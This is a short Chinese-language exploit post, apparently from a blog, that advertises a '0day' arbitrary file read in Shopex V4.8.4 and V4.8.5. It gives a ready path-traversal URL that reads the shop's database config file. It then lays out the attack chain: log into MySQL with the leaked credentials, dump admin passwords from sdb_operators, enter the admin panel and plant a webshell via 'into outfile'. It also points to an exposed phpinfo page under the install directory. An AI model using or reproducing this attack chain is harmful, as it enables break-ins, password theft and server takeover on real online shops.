Shopex V4.8.4 V4.8.5 0Day 通杀
影响版本: Shopex V4.8.4 V4.8.5
漏洞描述: 文件过滤不严,导致任意文件读取漏洞。
测试代码:
http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php
可以连上数据库.
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell,没有仔细研究.
我测试的站,直接用into outfile 一个shell.
网上有个帖子,说可以爆物理路径.测试不可用.
如果install目录没删.下面这个可以看phpinfo
http://www.target.com/install/svinfo.php?phpinfo=true
另外/home/cache/目录的文件,也是可以爆出来的.
姓名:Chinadu
近期评论